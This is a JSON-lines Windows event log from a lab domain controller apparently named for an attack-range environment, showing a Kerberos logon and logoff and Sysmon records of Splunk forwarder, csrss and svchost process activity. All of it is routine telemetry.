{"EventTime":"2020-08-01 08:01:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220680,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x97EDC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50202\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x97edc","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50202","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:01:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220681,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x97EDC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x97edc","LogonType":"3","EventReceivedTime":"2020-08-01 08:01:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nProcessGuid: {41C8662E-2164-5F25-0000-0010D67F0900}\r\nProcessId: 4536\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","ProcessGuid":"{41C8662E-2164-5F25-0000-0010D67F0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2164-5F25-0000-0010D67F0900}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2164-5F25-0000-0010D67F0900}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2164-5F25-0000-0010D67F0900}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2164-5F25-0000-0010D67F0900}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
